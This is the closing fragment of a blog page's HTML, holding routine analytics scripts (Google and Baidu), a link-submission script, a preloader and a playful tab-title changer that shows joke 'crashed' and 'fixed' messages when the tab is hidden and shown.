    gtag('config', 'G-2RESQZ27F8');
</script>


    <!-- Baidu Analytics -->

<script>
    var _hmt = _hmt || [];
    (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?ef58e881bb945659eff9f19c48cb1c8f";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
    })();
</script>

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>


    
        <script src="/libs/others/clicklove.js" async="async"></script>
    

    <!-- 网页预加载 -->
    
        <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

    <!-- 不蒜子统计网站数据 -->

    

    <!-- 动态改变 title -->
    <script >
   var OriginTitile = document.title;
   var st;
document.addEventListener("visibilitychange",
    function _dynamicTitle() { 
        document.hidden ? (document.title = "Σ(っ °Д °;)っ喔哟，崩溃啦！", clearTimeout(st)) 
        : (document.title = "φ(゜▽゜*)♪咦，又好了！", st = setTimeout(function () { document.title = OriginTitile }, 3e3)) });
</script>
</body>
</html>